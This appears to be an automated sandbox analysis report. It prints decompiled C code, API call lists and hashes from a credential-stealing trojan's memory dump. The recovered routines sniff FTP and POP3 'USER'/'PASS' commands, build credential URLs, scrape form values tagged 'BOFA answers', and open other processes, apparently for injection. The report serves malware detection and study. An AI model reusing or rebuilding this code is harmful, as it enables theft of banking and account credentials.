    0x0040a58c
    0x00000000
    0x00000000
    0x00000000
    0x0040a58c
    0x0040a592
    0x00000000
    0x00000000
    0x0040a59b
    0x0040a59c
    0x0040a59e
    0x0040a5a1
    0x0040a5a5
    0x0040a5b1
    0x0040a5b3
    0x00000000
    0x00000000
    0x0040a5bb
    0x0040a5c3
    0x00000000
    0x00000000
    0x0040a5cd
    0x0040a5d0
    0x0040a5d3
    0x0040a5d5
    0x0040a5dc
    0x0040a5df
    0x0040a5e2
    0x0040a5e5
    0x0040a5e7
    0x0040a5ea
    0x0040a5f3
    0x0040a5f5
    0x0040a5f5
    0x0040a5fb
    0x0040a608
    0x0040a60b
    0x0040a63d
    0x0040a640
    0x0040a640
    0x0040a643
    0x0040a646
    0x0040a650
    0x0040a653
    0x00000000
    0x00000000
    0x0040a659
    0x0040a660
    0x0040a660
    0x0040a660
    0x0040a663
    0x0040a663
    0x0040a669
    0x0040a669
    0x0040a67e
    0x0040a680
    0x0040a685
    0x0040a687
    0x00000000
    0x00000000
    0x0040a689
    0x0040a68a
    0x0040a68d
    0x00000000
    0x00000000
    0x00000000
    0x0040a68f
    0x0040a694
    0x0040a694
    0x0040a694
    0x0040a697
    0x0040a69a
    0x0040a69a
    0x0040a69d
    0x0040a6a3
    0x0040a6a5
    0x0040a6a7
    0x0040a6ab
    0x0040a6b7
    0x0040a6b9
    0x00000000
    0x00000000
    0x0040a6c1
    0x0040a6c9
    0x00000000
    0x00000000
    0x0040a6cb
    0x0040a6d7
    0x0040a6ee
    0x0040a6f4
    0x0040a6f9
    0x0040a6ff
    0x0040a705
    0x0040a70c
    0x0040a73d
    0x0040a742
    0x0040a742
    0x0040a742
    0x00000000
    0x0040a742
    0x00000000
    0x0040a70c
    0x0040a6ad
    0x0040a6b2
    0x0040a6b5
    0x00000000
    0x00000000
    0x00000000
    0x0040a6b5
    0x00000000
    0x0040a6ad
    0x0040a64b
    0x00000000
    0x0040a64b
    0x0040a60d
    0x0040a60f
    0x0040a611
    0x0040a61f
    0x0040a61f
    0x0040a622
    0x0040a625
    0x0040a627
    0x00000000
    0x00000000
    0x00000000
    0x0040a627
    0x0040a613
    0x0040a615
    0x00000000
    0x00000000
    0x0040a61a
    0x00000000
    0x0040a5fd
    0x0040a600
    0x00000000
    0x00000000
    0x0040a606
    0x0040a62d
    0x0040a62d
    0x0040a62e
    0x0040a62f
    0x0040a632
    0x0040a638
    0x00000000
    0x0040a638
    0x0040a5a7
    0x0040a5ac
    0x0040a5af
    0x00000000
    0x00000000
    0x00000000
    0x0040a5af
    0x00000000
    0x0040a5a7
    0x0040a529
    0x00000000
    0x0040a529
    0x0040a4f1
    0x0040a4f3
    0x0040a4f5
    0x0040a503
    0x0040a503
    0x0040a506
    0x0040a509
    0x0040a50b
    0x00000000
    0x00000000
    0x00000000
    0x0040a50b
    0x0040a4f7
    0x0040a4f9
    0x00000000
    0x00000000
    0x0040a4fe
    0x00000000
    0x0040a4e1
    0x0040a4e4
    0x0040a746
    0x0040a748
    0x0040a74b
    0x0040a75c
    0x0040a767
    0x0040a767
    0x00000000
    0x0040a74b
    0x0040a4ea
    0x0040a511
    0x0040a511
    0x0040a512
    0x0040a513
    0x0040a514
    0x0040a519
    0x00000000
    0x0040a70e
    0x0040a719
    0x0040a71c
    0x0040a71f
    0x0040a724
    0x0040a72b
    0x0040a72e
    0x0040a72e
    0x00000000
    0x0040a738
    0x0040a45b
    0x00000000
    0x0040a45b
    0x0040a423
    0x0040a425
    0x0040a427
    0x0040a435
    0x0040a435
    0x0040a438
    0x0040a43b
    0x0040a43d
    0x00000000
    0x00000000
    0x00000000
    0x0040a43d
    0x0040a429
    0x0040a42b
    0x00000000
    0x00000000
    0x0040a430
    0x00000000
    0x0040a413
    0x0040a416
    0x0040a76c
    0x0040a76f
    0x00000000
    0x0040a774
    0x0040a41c
    0x0040a443
    0x0040a443
    0x0040a444
    0x0040a445
    0x0040a446
    0x0040a44b
    0x00000000
    0x0040a44b
    0x0040a3b3
    0x0040a780

    APIs
    • lstrcpy.KERNEL32(?,?), ref: 0040A35D
    • lstrcpy.KERNEL32(?,?), ref: 0040A394
    • InternetOpenA.WININET(00000000,00000000,00000000,00000000), ref: 0040A3AB
    • InternetOpenUrlA.WININET(00000000,0000002F,00000000,00000000,84043300,00000000), ref: 0040A3C9
    • wnsprintfA.SHLWAPI ref: 0040A6EE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: InternetOpenlstrcpy$wnsprintf
    • String ID: *<input *value="$*<option selected$*<select $/$BOFA answers:%S
    • API String ID: 3861095738-10845715
    • Opcode ID: beb117f57832040d7a003db7cf1a0be587a4824c84bba778cbc4f74d0bbcf423
    • Instruction ID: 62f4277ad54571159e7ca5874afd36bd0039eee741a0e52402f6040435e6209f
    • Opcode Fuzzy Hash: beb117f57832040d7a003db7cf1a0be587a4824c84bba778cbc4f74d0bbcf423
    • Instruction Fuzzy Hash: B3D1AF71A00209AFDF20CFA8C984BFEB7B5FB45304F14847BD541B7281D7789A668B5A
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040C181, Relevance: 16.6, APIs: 11, Instructions: 105networkfileCOMMON
    Download Yara Rule
    APIs
    • RtlEnterCriticalSection.NTDLL(00412E1C), ref: 0040C18F
    • ResetEvent.KERNEL32(?), ref: 0040C1BD
    • SetEvent.KERNEL32(?), ref: 0040C1FF
    • RtlLeaveCriticalSection.NTDLL(00412E1C), ref: 0040C206
    • InternetQueryOptionA.WININET(?,0000002D,00000000,?), ref: 0040C22F
    • InternetSetOptionA.WININET(?,0000002D,00000000,00000004), ref: 0040C245
    • RtlLeaveCriticalSection.NTDLL(00412E1C), ref: 0040C252
    • InternetReadFile.WININET(?,?,?,?), ref: 0040C26A
    • InternetReadFileExA.WININET(?,?,?,?), ref: 0040C284
    • InternetReadFileExW.WININET(?,?,?,?), ref: 0040C298
    • InternetQueryDataAvailable.WININET(?,?,?,?), ref: 0040C2A6
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Internet$CriticalFileReadSection$EventLeaveOptionQuery$AvailableDataEnterReset
    • String ID:
    • API String ID: 830436639-0
    • Opcode ID: 65432b94355bdd76ec19613376c30a5daba110173d2da11cce4b4a19b3387233
    • Instruction ID: 6600c66c4eeaa57c0f761191466cd4c661b328488be23d608169a2ad0b675bea
    • Opcode Fuzzy Hash: 65432b94355bdd76ec19613376c30a5daba110173d2da11cce4b4a19b3387233
    • Instruction Fuzzy Hash: D9418B71900208FFDF169F90DD88ADA3F36FF04350F10826AF911A65A1C379D9A1DB94
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004085E6, Relevance: 16.6, APIs: 11, Instructions: 78threadprocessstringCOMMON
    Download Yara Rule
    C-Code - Quality: 87%
    			E004085E6() {
				void* _v8;
				char _v12;
				intOrPtr _v16;
				int _v20;
				short _v544;
				long _v572;
				void* _v580;
				void* __edi;
				intOrPtr _t20;
				void* _t25;
				void* _t26;
				intOrPtr _t28;
				void* _t30;
				void* _t36;
				void* _t38;

				_t20 =  *0x412a64; // 0x246f5a8
				_v16 = E00409266(0,  *((intOrPtr*)(_t20 + 0x2c)), 4, 0, 0, 0, 0);
				_t36 = GetCurrentThread();
				_v20 = GetThreadPriority(_t36);
				SetThreadPriority(_t36, 1);
				_v12 = 3;
				do {
					_v580 = 0x22c;
					_t25 = CreateToolhelp32Snapshot(2, 0);
					_t37 =  &_v580;
					_v8 = _t25;
					Process32FirstW(_t25,  &_v580);
					while(_t25 != 0) {
						_t26 = _v572;
						__eflags = _t26;
						if(_t26 != 0) {
							__eflags = _t26 -  *0x412ba0; // 0x17c0
							if(__eflags != 0) {
								__eflags = _t26 - _v16;
								if(_t26 != _v16) {
									_t28 =  *0x412a64; // 0x246f5a8
									_t30 = lstrcmpiW( &_v544,  *(_t28 + 0x50));
									__eflags = _t30;
									if(_t30 != 0) {
										_t38 = OpenProcess(0x43a, 0, _v572);
										__eflags = _t38;
										if(_t38 != 0) {
											_push(_v572);
											E00406CBE(_t37, _t38);
											CloseHandle(_t38);
										}
									}
								}
							}
						}
						_t25 = Process32NextW(_v8,  &_v580);
					}
					CloseHandle(_v8);
					_t17 =  &_v12;
					 *_t17 = _v12 - 1;
				} while ( *_t17 != 0);
				return SetThreadPriority(_t36, _v20);
			}


















    0x004085ef
    0x00408607
    0x00408610
    0x0040861c
    0x0040861f
    0x00408625
    0x0040862c
    0x0040862f
    0x00408639
    0x0040863f
    0x00408647
    0x0040864a
    0x004086bc
    0x00408652
    0x00408658
    0x0040865a
    0x0040865c
    0x00408662
    0x00408664
    0x00408667
    0x00408669
    0x00408678
    0x0040867e
    0x00408680
    0x00408694
    0x00408696
    0x00408698
    0x0040869a
    0x004086a0
    0x004086a6
    0x004086a6
    0x00408698
    0x00408680
    0x00408667
    0x00408662
    0x004086b6
    0x004086b6
    0x004086c3
    0x004086c9
    0x004086c9
    0x004086c9
    0x004086e0

    APIs
      • Part of subcall function 00409266: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,000000FF,?,?,00000000), ref: 004092BB
      • Part of subcall function 00409266: SetNamedPipeHandleState.KERNEL32(00000000,000000FF,00000000,00000000,?,?,00000000), ref: 004092D6
      • Part of subcall function 00409266: WriteFile.KERNEL32(00000000,?,00000004,00000002,00000000,?,?,00000000), ref: 004092F2
      • Part of subcall function 00409266: WriteFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040930B
      • Part of subcall function 00409266: WriteFile.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 00409325
      • Part of subcall function 00409266: ReadFile.KERNEL32(00000000,00000002,00000004,00000002,00000000,?,?,00000000), ref: 0040933E
      • Part of subcall function 00409266: ReadFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040935B
    • GetCurrentThread.KERNEL32 ref: 0040860A
    • GetThreadPriority.KERNEL32(00000000), ref: 00408613
    • SetThreadPriority.KERNEL32(00000000,00000001), ref: 0040861F
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00408639
    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040864A
    • lstrcmpiW.KERNEL32(?,?), ref: 00408678
    • OpenProcess.KERNEL32(0000043A,00000000,?), ref: 0040868E
    • CloseHandle.KERNEL32(00000000), ref: 004086A6
    • Process32NextW.KERNEL32(?,0000022C), ref: 004086B6
    • CloseHandle.KERNEL32(?), ref: 004086C3
    • SetThreadPriority.KERNEL32(00000000,?), ref: 004086D6
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$Thread$HandlePriorityWrite$CloseCreateProcess32Read$CurrentFirstNamedNextOpenPipeProcessSnapshotStateToolhelp32lstrcmpi
    • String ID:
    • API String ID: 2830737922-0
    • Opcode ID: 8951a03c2d31b1ab908ca8fa1dbaff33716ad3ebc9fde356d2d63f61b29fe255
    • Instruction ID: 9a9bd4c2afa24e14eef20e971ad9867caeee014da293db9c704cd86f811b27c4
    • Opcode Fuzzy Hash: 8951a03c2d31b1ab908ca8fa1dbaff33716ad3ebc9fde356d2d63f61b29fe255
    • Instruction Fuzzy Hash: EF210E71900114AFDB206FA1EE4DADEBF79FF04754F0044A6F509E2161DBB99A60CF58
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040CAFC, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 281COMMON
    Download Yara Rule
    C-Code - Quality: 73%
    			E0040CAFC(void* __eax, int _a4, int _a8) {
				int _v24;
				signed char _v28;
				signed char _v29;
				signed char _v30;
				signed char _v31;
				signed int _v32;
				signed int _v34;
				int _v36;
				char _v37;
				char _v49;
				void* __esi;
				int _t74;
				void* _t75;
				intOrPtr _t76;
				int _t82;
				int _t85;
				int _t97;
				int _t99;
				int _t101;
				int _t103;
				int _t105;
				int _t107;
				void* _t108;
				int _t109;
				int _t116;
				int _t127;
				signed int _t128;
				char* _t133;
				intOrPtr _t134;
				int _t140;
				int _t147;
				int _t149;
				intOrPtr _t151;
				int _t154;
				int _t157;

				_t74 = __eax;
				_t149 = _a8;
				_t154 = __eax;
				if(( *0x412af8 & 0x00000002) == 0) {
					L3:
					__eflags = _t149 - 3;
					if(_t149 < 3) {
						L73:
						return _t74;
					}
					__eflags = _t154;
					if(_t154 == 0) {
						goto L73;
					}
					__eflags = _a4;
					if(_a4 == 0) {
						goto L73;
					}
					_t75 =  *_t154;
					_v28 = 0;
					_v32 = 0;
					__eflags = _t75 - 0x55;
					if(_t75 != 0x55) {
						L12:
						__eflags = _t75 - 0x50;
						if(_t75 != 0x50) {
							while(1) {
								L41:
								__eflags = _t149 - 1;
								if(_t149 <= 1) {
									break;
								}
								_t76 =  *((intOrPtr*)(_t154 + _t149 - 1));
								__eflags = _t76 - 0xd;
								if(_t76 == 0xd) {
									L40:
									_t149 = _t149 - 1;
									__eflags = _t149;
									continue;
								}
								__eflags = _t76 - 0xa;
								if(_t76 != 0xa) {
									break;
								}
								goto L40;
							}
							_t74 = _t149 - 3;
							__eflags = _t74 - 1;
							if(_t74 > 1) {
								goto L73;
							}
							 *0x412dd4(0x412e34);
							_t127 = E0040C9C5(_a4);
							_v32 = _t127;
							__eflags = _t127;
							if(_t127 == 0) {
								L72:
								_t74 =  *0x412dd8(0x412e34);
								goto L73;
							}
							__eflags =  *(_t127 + 4);
							if( *(_t127 + 4) == 0) {
								L70:
								_push(0);
								L71:
								E0040CA5A(_t127);
								goto L72;
							}
							__eflags =  *(_t127 + 8);
							if( *(_t127 + 8) == 0) {
								goto L70;
							}
							__eflags = _t149 - 3;
							if(_t149 != 3) {
								_t128 = 4;
								__eflags = _t149 - _t128;
								if(_t149 != _t128) {
									goto L72;
								}
								_t151 =  *0x412a64; // 0x246f5a8
								_t141 = _t128;
								_t82 = E0040D3EC(_t128, _t154, _t128,  *((intOrPtr*)(_t151 + 0x128)));
								__eflags = _t82;
								if(_t82 == 0) {
									L56:
									_v37 = 1;
									L60:
									_t127 = _v28;
									L61:
									_v28 = 0x10;
									_t85 =  *0x412bc8(_a4,  &_v24,  &_v28);
									__eflags = _t85;
									if(_t85 != 0) {
										L65:
										__eflags = _v49 - 2;
										if(_v49 != 2) {
											L68:
											_push(0);
											goto L71;
										}
										_t133 = "pop3";
										L67:
										_push((_v34 & 0xff) << 0x00000008 | (_v34 & 0x0000ffff) >> 0x00000008);
										_push(_v29 & 0x000000ff);
										_push(_v30 & 0x000000ff);
										_push(_v31 & 0x000000ff);
										_push(_v32 & 0x000000ff);
										_push( *(_t127 + 8));
										_push( *(_t127 + 4));
										__eflags = _v49 - 1;
										__eflags = (_v49 != 1) + 0x64;
										E00410EC7(_t133, (_v34 & 0xff) << 0x00000008 | (_v34 & 0x0000ffff) >> 0x00000008, (_v49 != 1) + 0x64, (_v49 != 1) + 0x64, 0, 0, L"%S://%S:%S@%u.%u.%u.%u:%u/", _t133);
										goto L68;
									}
									_t97 = E00406114( &_v36);
									__eflags = _t97;
									if(_t97 != 0) {
										goto L65;
									}
									__eflags = _v49 - 1;
									if(_v49 != 1) {
										goto L65;
									}
									_t134 =  *0x412a64; // 0x246f5a8
									_t99 = E0040D3EC(_t141 | 0xffffffff,  *((intOrPtr*)(_t134 + 0x13c)), _t141 | 0xffffffff,  *(_t127 + 4));
									__eflags = _t99;
									if(_t99 != 0) {
										_t133 = "ftp";
										goto L67;
									}
									goto L65;
								}
								_t141 = _t128;
								_t101 = E0040D3EC(_t128, _t154, _t128,  *((intOrPtr*)(_t151 + 0x12c)));
								__eflags = _t101;
								if(_t101 == 0) {
									goto L56;
								}
								_t141 = _t128;
								_t103 = E0040D3EC(_t128, _t154, _t128,  *((intOrPtr*)(_t151 + 0x130)));
								__eflags = _t103;
								if(_t103 != 0) {
									_t141 = _t128;
									_t105 = E0040D3EC(_t128, _t154, _t128,  *((intOrPtr*)(_t151 + 0x134)));
									__eflags = _t105;
									if(_t105 == 0) {
										L59:
										_v37 = 2;
										goto L60;
									}
									_t141 = _t128;
									_t107 = E0040D3EC(_t128, _t154, _t128,  *((intOrPtr*)(_t151 + 0x138)));
									__eflags = _t107;
									if(_t107 != 0) {
										goto L72;
									}
									goto L59;
								}
								goto L56;
							}
							_t108 =  *_t154;
							__eflags = _t108 - 0x43;
							if(_t108 == 0x43) {
								L49:
								__eflags =  *((char*)(_t154 + 1)) - 0x57;
								if( *((char*)(_t154 + 1)) != 0x57) {
									goto L72;
								}
								__eflags =  *((char*)(_t154 + 2)) - 0x44;
								if( *((char*)(_t154 + 2)) != 0x44) {
									goto L72;
								}
								_v37 = 1;
								goto L61;
							}
							__eflags = _t108 - 0x50;
							if(_t108 != 0x50) {
								goto L72;
							}
							goto L49;
						}
						__eflags =  *((char*)(_t154 + 1)) - 0x41;
						if( *((char*)(_t154 + 1)) != 0x41) {
							goto L41;
						}
						__eflags =  *((char*)(_t154 + 2)) - 0x53;
						if( *((char*)(_t154 + 2)) != 0x53) {
							goto L41;
						}
						__eflags =  *((char*)(_t154 + 3)) - 0x53;
						if( *((char*)(_t154 + 3)) != 0x53) {
							goto L41;
						}
						__eflags =  *((char*)(_t154 + 4)) - 0x20;
						if( *((char*)(_t154 + 4)) != 0x20) {
							goto L41;
						} else {
							_v28 = 5;
							L18:
							_t18 = _t149 - _v32 + 1; // 0x6
							_t74 = _t18;
							__eflags = _t74;
							if(_t74 == 0) {
								goto L73;
							}
							_t74 = E0040CF2D(_t74);
							_t147 = _t74;
							_v24 = _t147;
							__eflags = _t147;
							if(_t147 == 0) {
								goto L73;
							}
							_t140 = _v32;
							__eflags = _t140;
							if(_t140 == 0) {
								_t140 = _v28;
							}
							while(1) {
								__eflags = _t140 - _t149;
								if(_t140 >= _t149) {
									break;
								}
								_t109 =  *((intOrPtr*)(_t140 + _t154));
								__eflags = _t109 - 0xa;
								if(_t109 != 0xa) {
									__eflags = _t109 - 0xd;
									if(_t109 != 0xd) {
										__eflags = _t109;
										if(_t109 != 0) {
											 *_t147 = _t109;
										}
									}
								}
								_t140 = _t140 + 1;
								_t147 = _t147 + 1;
								__eflags = _t147;
							}
							 *0x412dd4(0x412e34);
							__eflags = _v36;
							if(_v36 == 0) {
								__eflags = _v32;
								if(_v32 == 0) {
									L37:
									 *0x412dd8(0x412e34);
									_t74 = E0040CF40(_v32);
									goto L73;
								}
								_t157 = E0040C9C5(_a4);
								__eflags = _t157;
								if(_t157 == 0) {
									goto L37;
								}
								E0040CF40( *(_t157 + 8));
								__eflags = _a8 - _v36;
								_t116 = E0040D0D5(_a8 - _v36, _v32);
								 *(_t157 + 8) = _t116;
								L35:
								__eflags = _t116;
								if(_t116 == 0) {
									E0040CA5A(_t157, _t116);
								}
								goto L37;
							}
							_t157 = E0040C9C5(_a4);
							__eflags = _t157;
							if(_t157 != 0) {
								L31:
								E0040CA5A(_t157, 1);
								 *_t157 = _a4;
								_t116 = E0040D0D5(_t130, _v32);
								 *(_t157 + 4) = _t116;
								goto L35;
							}
							_t157 = E0040C9FD(_a4);
							__eflags = _t157;
							if(_t157 == 0) {
								goto L37;
							}
							goto L31;
						}
					}
					__eflags =  *((char*)(_t154 + 1)) - 0x53;
					if( *((char*)(_t154 + 1)) != 0x53) {
						goto L12;
					}
					__eflags =  *((char*)(_t154 + 2)) - 0x45;
					if( *((char*)(_t154 + 2)) != 0x45) {
						goto L12;
					}
					__eflags =  *((char*)(_t154 + 3)) - 0x52;
					if( *((char*)(_t154 + 3)) != 0x52) {
						goto L12;
					}
					__eflags =  *((char*)(_t154 + 4)) - 0x20;
					if( *((char*)(_t154 + 4)) != 0x20) {
						goto L12;
					} else {
						_v32 = 5;
						goto L18;
					}
				}
				_t74 = IsBadHugeWritePtr(__eax, _t149);
				if(_t74 != 0) {
					goto L3;
				} else {
					_t74 = E0040CFFE(E0040DF51(0xff, _t74), _t154, _t124, _t149);
					goto L73;
				}
			}






































    0x0040cafc
    0x0040cb0f
    0x0040cb12
    0x0040cb14
    0x0040cb3a
    0x0040cb3a
    0x0040cb3d
    0x0040ce81
    0x0040ce87
    0x0040ce87
    0x0040cb45
    0x0040cb47
    0x00000000
    0x00000000
    0x0040cb4d
    0x0040cb50
    0x00000000
    0x00000000
    0x0040cb56
    0x0040cb58
    0x0040cb5c
    0x0040cb60
    0x0040cb62
    0x0040cb86
    0x0040cb86
    0x0040cb88
    0x0040ccae
    0x0040ccae
    0x0040ccae
    0x0040ccb1
    0x00000000
    0x00000000
    0x0040cca1
    0x0040cca5
    0x0040cca7
    0x0040ccad
    0x0040ccad
    0x0040ccad
    0x00000000
    0x0040ccad
    0x0040cca9
    0x0040ccab
    0x00000000
    0x00000000
    0x00000000
    0x0040ccab
    0x0040ccb3
    0x0040ccb6
    0x0040ccb9
    0x00000000
    0x00000000
    0x0040ccc4
    0x0040ccd2
    0x0040ccd6
    0x0040ccda
    0x0040ccdc
    0x0040ce76
    0x0040ce7b
    0x00000000
    0x0040ce7b
    0x0040cce2
    0x0040cce5
    0x0040ce6e
    0x0040ce6e
    0x0040ce6f
    0x0040ce71
    0x00000000
    0x0040ce71
    0x0040cceb
    0x0040ccee
    0x00000000
    0x00000000
    0x0040ccf4
    0x0040ccf7
    0x0040cd27
    0x0040cd28
    0x0040cd2a
    0x00000000
    0x00000000
    0x0040cd30
    0x0040cd3e
    0x0040cd42
    0x0040cd47
    0x0040cd49
    0x0040cd75
    0x0040cd75
    0x0040cdaf
    0x0040cdaf
    0x0040cdb3
    0x0040cdc0
    0x0040cdc8
    0x0040cdce
    0x0040cdd0
    0x0040ce03
    0x0040ce03
    0x0040ce08
    0x0040ce63
    0x0040ce63
    0x00000000
    0x0040ce63
    0x0040ce0a
    0x0040ce0f
    0x0040ce29
    0x0040ce2a
    0x0040ce30
    0x0040ce36
    0x0040ce3c
    0x0040ce3d
    0x0040ce42
    0x0040ce45
    0x0040ce57
    0x0040ce5b
    0x00000000
    0x0040ce60
    0x0040cdd6
    0x0040cddb
    0x0040cddd
    0x00000000
    0x00000000
    0x0040cddf
    0x0040cde4
    0x00000000
    0x00000000
    0x0040cde6
    0x0040cdfa
    0x0040cdff
    0x0040ce01
    0x0040ce67
    0x00000000
    0x0040ce67
    0x00000000
    0x0040ce01
    0x0040cd53
    0x0040cd57
    0x0040cd5c
    0x0040cd5e
    0x00000000
    0x00000000
    0x0040cd68
    0x0040cd6c
    0x0040cd71
    0x0040cd73
    0x0040cd84
    0x0040cd88
    0x0040cd8d
    0x0040cd8f
    0x0040cdaa
    0x0040cdaa
    0x00000000
    0x0040cdaa
    0x0040cd99
    0x0040cd9d
    0x0040cda2
    0x0040cda4
    0x00000000
    0x00000000
    0x00000000
    0x0040cda4
    0x00000000
    0x0040cd73
    0x0040ccf9
    0x0040ccfb
    0x0040ccfd
    0x0040cd07
    0x0040cd07
    0x0040cd0b
    0x00000000
    0x00000000
    0x0040cd11
    0x0040cd15
    0x00000000
    0x00000000
    0x0040cd1b
    0x00000000
    0x0040cd1b
    0x0040ccff
    0x0040cd01
    0x00000000
    0x00000000
    0x00000000
    0x0040cd01
    0x0040cb8e
    0x0040cb92
    0x00000000
    0x00000000
    0x0040cb98
    0x0040cb9c
    0x00000000
    0x00000000
    0x0040cba2
    0x0040cba6
    0x00000000
    0x00000000
    0x0040cbac
    0x0040cbb0
    0x00000000
    0x0040cbb6
    0x0040cbb6
    0x0040cbbe
    0x0040cbc4
    0x0040cbc4
    0x0040cbc7
    0x0040cbc9
    0x00000000
    0x00000000
    0x0040cbcf
    0x0040cbd4
    0x0040cbd6
    0x0040cbda
    0x0040cbdc
    0x00000000
    0x00000000
    0x0040cbe2
    0x0040cbe6
    0x0040cbe8
    0x0040cbea
    0x0040cbea
    0x0040cc03
    0x0040cc03
    0x0040cc05
    0x00000000
    0x00000000
    0x0040cbf0
    0x0040cbf3
    0x0040cbf5
    0x0040cbf7
    0x0040cbf9
    0x0040cbfb
    0x0040cbfd
    0x0040cbff
    0x0040cbff
    0x0040cbfd
    0x0040cbf9
    0x0040cc01
    0x0040cc02
    0x0040cc02
    0x0040cc02
    0x0040cc0d
    0x0040cc13
    0x0040cc18
    0x0040cc52
    0x0040cc57
    0x0040cc8c
    0x0040cc8d
    0x0040cc97
    0x00000000
    0x0040cc97
    0x0040cc61
    0x0040cc63
    0x0040cc65
    0x00000000
    0x00000000
    0x0040cc6a
    0x0040cc72
    0x0040cc7a
    0x0040cc7f
    0x0040cc82
    0x0040cc82
    0x0040cc84
    0x0040cc87
    0x0040cc87
    0x00000000
    0x0040cc84
    0x0040cc22
    0x0040cc24
    0x0040cc26
    0x0040cc36
    0x0040cc38
    0x0040cc44
    0x0040cc48
    0x0040cc4d
    0x00000000
    0x0040cc4d
    0x0040cc30
    0x0040cc32
    0x0040cc34
    0x00000000
    0x00000000
    0x00000000
    0x0040cc34
    0x0040cbb0
    0x0040cb64
    0x0040cb68
    0x00000000
    0x00000000
    0x0040cb6a
    0x0040cb6e
    0x00000000
    0x00000000
    0x0040cb70
    0x0040cb74
    0x00000000
    0x00000000
    0x0040cb76
    0x0040cb7a
    0x00000000
    0x0040cb7c
    0x0040cb7c
    0x00000000
    0x0040cb7c
    0x0040cb7a
    0x0040cb18
    0x0040cb20
    0x00000000
    0x0040cb22
    0x0040cb30
    0x00000000
    0x0040cb30

    APIs
    • IsBadHugeWritePtr.KERNEL32(?,?), ref: 0040CB18
    • RtlEnterCriticalSection.NTDLL(00412E34), ref: 0040CC0D
    • RtlLeaveCriticalSection.NTDLL(00412E34), ref: 0040CC8D
    • RtlEnterCriticalSection.NTDLL(00412E34), ref: 0040CCC4
    • getpeername.WS2_32(?), ref: 0040CDC8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalSection$Enter$HugeLeaveWritegetpeername
    • String ID: %S://%S:%S@%u.%u.%u.%u:%u/$ftp$pop3
    • API String ID: 133427328-3711411108
    • Opcode ID: 999ed23411a69ab54b3fcc6eaf88037fc7a5798dd97aa0defd1db77dec703553
    • Instruction ID: 82fc01ed63dc4dd93b4ee8b747fb204174c656f27e0997f11a1d1815cea37a59
    • Opcode Fuzzy Hash: 999ed23411a69ab54b3fcc6eaf88037fc7a5798dd97aa0defd1db77dec703553
    • Instruction Fuzzy Hash: 16A1E170608241DAEB219F25C9C476BBAD55F55308F04863FF889A62D2C73CCD8AD79A
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00409266, Relevance: 15.1, APIs: 10, Instructions: 139filepipeCOMMON
    Download Yara Rule
    C-Code - Quality: 88%
    			E00409266(void* __eflags, long _a4, void _a8, void** _a12, long* _a16, void _a20, void _a24) {
				char _v5;
				void _v12;
				short _v532;
				long* _t67;
				void** _t69;
				long _t70;
				void* _t71;
				long _t73;
				void* _t74;

				_v12 = _v12 | 0xffffffff;
				_v5 = 1;
				E00408F6C( &_v532, _a4);
				while(1) {
					_t71 = CreateFileW( &_v532, 0xc0000000, 3, 0, 3, 0, 0);
					if(_t71 != 0xffffffff) {
						break;
					}
					if(_v5 != 0) {
						WaitNamedPipeW( &_v532, 0xffffffff);
						_v5 = 0;
						continue;
					}
					L23:
					return _v12;
				}
				_a4 = 2;
				if(SetNamedPipeHandleState(_t71,  &_a4, 0, 0) != 0) {
					_push(0);
					_push( &_a4);
					_t73 = 4;
					if(WriteFile(_t71,  &_a8, _t73, ??, ??) != 0 && WriteFile(_t71,  &_a24, _t73,  &_a4, 0) != 0 && WriteFile(_t71, _a20, _a24,  &_a4, 0) != 0 && ReadFile(_t71,  &_v12, _t73,  &_a4, 0) != 0 && _a4 == _t73) {
						_a20 = 0;
						if(ReadFile(_t71,  &_a20, _t73,  &_a4, 0) == 0 || _a4 != _t73) {
							_v12 = _v12 | 0xffffffff;
						} else {
							_t62 = _a20;
							if(_a20 > 0) {
								_t74 = E0040CF2D(_t62);
								if(_t74 == 0 || ReadFile(_t71, _t74, _a20,  &_a4, 0) == 0) {
									L19:
									_v12 = _v12 | 0xffffffff;
									goto L20;
								} else {
									_t70 = _a20;
									if(_t70 != _a4) {
										goto L19;
									} else {
										_t69 = _a12;
										if(_t69 == 0) {
											L20:
											E0040CF40(_t74);
										} else {
											_t67 = _a16;
											if(_t67 == 0) {
												goto L20;
											} else {
												 *_t69 = _t74;
												 *_t67 = _t70;
											}
										}
									}
								}
							}
						}
					}
				}
				CloseHandle(_t71);
				goto L23;
			}












    0x0040926f
    0x0040927f
    0x00409283
    0x004092ac
    0x004092c1
    0x004092c6
    0x00000000
    0x00000000
    0x00409294
    0x004092a3
    0x004092a9
    0x00000000
    0x004092a9
    0x004093c3
    0x004093ca
    0x004093ca
    0x004092cf
    0x004092de
    0x004092e4
    0x004092e8
    0x004092eb
    0x004092fa
    0x00409358
    0x00409363
    0x004093b8
    0x0040936a
    0x0040936a
    0x0040936f
    0x00409376
    0x0040937a
    0x004093ac
    0x004093ac
    0x00000000
    0x00409390
    0x00409390
    0x00409396
    0x00000000
    0x00409398
    0x00409398
    0x0040939d
    0x004093b0
    0x004093b1
    0x0040939f
    0x0040939f
    0x004093a4
    0x00000000
    0x004093a6
    0x004093a6
    0x004093a8
    0x004093a8
    0x004093a4
    0x0040939d
    0x00409396
    0x0040937a
    0x0040936f
    0x00409363
    0x004092fa
    0x004093bd
    0x00000000

    APIs
      • Part of subcall function 00408F6C: lstrcpyW.KERNEL32(?,\\.\pipe\), ref: 00408F75
